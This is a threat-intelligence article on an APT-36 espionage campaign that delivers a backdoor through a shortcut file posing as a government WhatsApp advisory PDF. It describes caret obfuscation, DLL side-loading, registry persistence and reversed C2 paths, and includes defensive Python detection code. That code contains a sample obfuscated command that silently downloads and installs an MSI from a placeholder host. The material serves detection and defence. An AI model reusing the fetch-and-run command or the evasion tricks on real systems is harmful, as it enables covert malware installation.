APT-36, the Pakistan-linked espionage group also tracked as Transparent Tribe, is compromising government systems with a lure that warns its targets about hackers. A new intelligence report from CYFIRMA exposes a targeted campaign in which the attackers weaponize a fake government advisory about “Fraudulent WhatsApp Messages” to deliver a backdoor.
This campaign highlights a dangerous evolution in social engineering, where threat actors exploit the very security awareness of their victims to compromise them.
The attack begins with a classic bait-and-switch. Victims receive what appears to be an urgent security advisory: a file named NCERT-Whatsapp-Advisory.pdf. The lure is timely and alarming, mimicking an official warning about a malicious WhatsApp campaign targeting high-level officials.
However, the file is not a PDF at all but a malicious Windows shortcut (.lnk). Explorer never displays the .lnk extension of a shortcut, whatever the user’s “hide extensions for known file types” setting (the LNK file type is registered with NeverShowExt), so a shortcut whose name ends in .pdf is listed as a document, and only the small arrow overlay on its icon gives it away. A user who double-clicks it believes they are opening a PDF.
“The campaign employs a deceptive government advisory lure, delivered as a malicious Windows shortcut file disguised as a PDF document, to initiate infection and evade user suspicion,” the report explains.
Once clicked, the shortcut doesn’t open a PDF reader, at least not immediately. Instead, it launches cmd.exe with a hidden window. The attackers obfuscate the command line by inserting a caret (^), the cmd.exe escape character, between the letters of the command. The interpreter strips the carets before execution, so the command runs exactly as intended, but a scanner or analyst matching on the plain-text string never sees the keywords it is looking for.
“The command string is deliberately encoded by inserting the caret (^) character after each letter, a simple but effective obfuscation technique to evade casual inspection”.
Once decoded, the command reaches out to a domain the report describes as compromised, aeroclubofindia[.]co[.]in, to download and install an MSI payload, with no window or prompt visible to the user.
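The two tricks in the infection chain above, a shortcut named like a PDF and a caret-laced command line, can both be checked mechanically. The following Python triage helper is an added example and is not code from the CYFIRMA report or the malware: it flags .lnk files carrying a document extension, undoes cmd.exe caret escaping the way the interpreter does (including the quoted-string and line-continuation cases), and scores caret density. The sample file name, the command line, the placeholder host example.invalid, the extension list and the 0.2 density threshold are all constructed assumptions.

```python
"""Triage helpers for a LNK-launched, caret-obfuscated cmd.exe command line.

Added example, not code from the CYFIRMA report. The sample file name and
command below are constructed; the URL host is a placeholder.
"""
import re

# Document-like extensions a shortcut might impersonate (assumed list, extend as needed).
DOC_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt"}

# Heuristic threshold: fraction of non-whitespace characters that are carets (assumption).
CARET_RATIO_THRESHOLD = 0.2


def is_disguised_shortcut(filename: str) -> bool:
    """True if a .lnk file carries a document extension just before .lnk.

    Explorer never shows the .lnk suffix (the LNK file type sets NeverShowExt),
    so 'Advisory.pdf.lnk' is listed as 'Advisory.pdf'.
    """
    name = filename.lower()
    if not name.endswith(".lnk"):
        return False
    stem = name[:-4]
    return any(stem.endswith(ext) for ext in DOC_EXTENSIONS)


def deobfuscate_cmd(cmdline: str) -> str:
    """Undo cmd.exe caret escaping the way the interpreter does.

    Outside double quotes a caret escapes the next character ('^^' -> '^',
    '^"' -> literal quote) and a caret before a newline is a line
    continuation; inside double quotes carets are literal.
    """
    out = []
    in_quotes = False
    i, n = 0, len(cmdline)
    while i < n:
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
            i += 1
        elif ch == "^" and not in_quotes:
            if i + 1 >= n:                 # trailing caret: dropped
                i += 1
            elif cmdline[i + 1] == "\n":   # line continuation: caret and newline removed
                i += 2
            else:                          # escaped character kept literally
                out.append(cmdline[i + 1])
                i += 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def caret_ratio(cmdline: str) -> float:
    """Fraction of non-whitespace characters that are carets."""
    body = re.sub(r"\s+", "", cmdline)
    return body.count("^") / len(body) if body else 0.0


def triage(filename: str, cmdline: str) -> dict:
    """Combine the checks into one verdict for a (shortcut name, command) pair."""
    plain = deobfuscate_cmd(cmdline)
    ratio = caret_ratio(cmdline)
    return {
        "disguised_shortcut": is_disguised_shortcut(filename),
        "caret_ratio": round(ratio, 3),
        "caret_obfuscated": ratio >= CARET_RATIO_THRESHOLD,
        "deobfuscated": plain,
        "fetches_remote": bool(re.search(r"https?://", plain, re.I)),
    }


# Constructed sample: a shortcut named like a PDF launching a caret-laced installer command.
SAMPLE_NAME = "NCERT-Whatsapp-Advisory.pdf.lnk"
SAMPLE_CMD = ("c^m^d /^c s^t^a^r^t /^m^i^n m^s^i^e^x^e^c /^i "
              "h^t^t^p^s://example.invalid/u.msi /^q^n")

if __name__ == "__main__":
    for key, value in triage(SAMPLE_NAME, SAMPLE_CMD).items():
        print(f"{key}: {value}")
```

Run it against the command line recorded in a process-creation event (Sysmon Event ID 1 or 4688) rather than against the shortcut's own bytes; the deobfuscated string is what you should pivot on for the download host, and a caret ratio well above zero on a cmd.exe launch is itself a useful detection signal, since ordinary administrative commands almost never escape every letter.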
To keep the victim calm, the malware performs a sleight of hand. While the infection takes root in the background, the malware drops and opens a legitimate-looking decoy PDF. This document, titled “NCERT Advisory: Fraudulent WhatsApp Message Campaign,” contains convincing details about a fake meeting chaired by the Prime Minister.
“While presenting legitimate-looking content to the victim, the malware silently establishes long-term access and enables remote command execution”.
Under the hood, the malware is a multi-stage framework built for long-term espionage. It deploys a .NET-based loader (ConsoleApp1.exe) that carries out the next steps:
- DLL hijacking: it drops a malicious copy of wininet.dll, the Windows Internet API library, so that a legitimate program loads the attacker’s DLL in place of the genuine one. That gives the implant a foothold inside a trusted process and a hook on that process’s network traffic.
- Persistence: it writes a hidden HTML Application (HTA) file that modifies the Windows Registry, so the malware is relaunched every time the computer reboots.
The malware communicates with its command-and-control (C2) servers using “reversed” endpoint names (e.g., /retsiger instead of /register) to slip past detection rules that match on the usual keywords. A signature written for the forward spelling never fires; an analyst who reverses the observed path gets the keyword back.
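The reversal trick described above is cheap to undo at the log layer. As an added example (not code from the CYFIRMA report or any IOC list it publishes), the following Python scanner parses proxy log lines, splits each request path into segments and reports any segment that spells a common C2 endpoint word backwards; it also emits the reversed spellings as a watch list for a forward-matching proxy rule. The log format, the host example.invalid and the keyword set are constructed assumptions; only the /register to /retsiger pair comes from the report.

```python
"""Detect reversed C2 endpoint names in web proxy logs.

Added example, not code from the CYFIRMA report. The log format, the host
example.invalid and the keyword list are constructed assumptions; only
/register -> /retsiger comes from the report.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Endpoint words a forward-matching signature might key on (assumed watch list).
C2_WORDS = {"register", "beacon", "command", "task", "result", "upload", "download", "heartbeat"}

# Constructed proxy log layout: "<timestamp> <client> <method> <url> <status>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def watchlist() -> List[str]:
    """Reversed spellings of the watch list, usable as literal strings in a proxy rule."""
    return sorted(word[::-1] for word in C2_WORDS)


def path_segments(url: str) -> List[str]:
    """Non-empty path components of a URL, e.g. /tluser/42 -> ['tluser', '42']."""
    return [seg for seg in urlsplit(url).path.split("/") if seg]


def reversed_keyword(segment: str) -> Optional[str]:
    """Return the watch-list word this segment spells backwards, or None."""
    candidate = segment.lower()[::-1]
    return candidate if candidate in C2_WORDS else None


def scan_log(lines) -> List[Dict[str, str]]:
    """Parse log lines and report every path segment that is a reversed keyword.

    Lines that do not match LOG_RE are skipped rather than raising, so one
    malformed record cannot stop the sweep.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        for seg in path_segments(m["url"]):
            word = reversed_keyword(seg)
            if word is not None:
                hits.append({"src": m["src"], "host": urlsplit(m["url"]).hostname or "",
                             "segment": seg, "reads_as": word})
    return hits


# Constructed log: one client hitting reversed endpoints, one legitimate /register call.
SAMPLE_LOG = """\
2025-06-01T09:00:01Z 10.0.0.5 GET http://example.invalid/retsiger 200
2025-06-01T09:00:05Z 10.0.0.5 POST http://example.invalid/tluser/42 200
2025-06-01T09:00:09Z 10.0.0.7 GET http://intranet.example.invalid/register 200
2025-06-01T09:00:12Z 10.0.0.5 GET http://example.invalid/nocaeb 204
this line is malformed and is skipped
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{hit['src']} -> {hit['host']}/{hit['segment']} reads as /{hit['reads_as']}")
```

Treat a hit as a triage signal rather than a verdict: a legitimate path can in principle spell a watch-list word backwards, so pair the match with the destination's reputation and the client's process context before blocking. The forward /register call in the sample is deliberately left unflagged, which is the point of the rule: it only fires on the mirrored spelling.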
Although the specific C2 infrastructure (wmiprovider[.]com) was inactive during the analysis, an idle domain is not a clean bill of health: the persistence mechanism installed on victim machines keeps beaconing after every reboot, and the operators can bring that domain, or a replacement, back online at any time. Affected hosts need the registry entry and the dropped files removed, not just the domain blocked.
“This activity highlights APT-36’s continued use of trusted advisory-themed lures and underscores the need for proactive, intelligence-led defense to identify and disrupt such campaigns at an early stage,” the report warns.